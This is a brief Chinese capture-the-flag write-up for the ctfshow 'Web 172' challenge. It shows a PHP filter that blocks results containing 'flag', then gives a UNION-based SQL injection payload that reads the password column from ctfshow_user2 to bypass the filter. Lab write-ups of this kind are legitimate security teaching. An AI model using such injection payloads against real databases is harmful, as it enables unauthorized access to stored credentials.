SQL注入：flag不能出现在查询当中

Web 172:

//检查结果是否有flag

&nbsp;&nbsp;&nbsp; if($row->username!=='flag'){

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ret['msg']='查询成功';

&nbsp;&nbsp;&nbsp; }

这里是检查我们查询的是否存在flag字样

我们可以使用加密：

To_base64()这样的方式绕过，但也可以直接强制转化username为1

99' union select 1,password from ctfshow_user2 where username='flag'%23

Tips:鼠标经过代码时会出现工具栏，工具栏上方有一键复制代码的功能哦~天云网络培训，专注于网络空间安全相关培训，并提供相关课程的在线培训报名微信 tyedu1
天云网络培训 » SQL注入：flag不能出现在查询当中

分享到：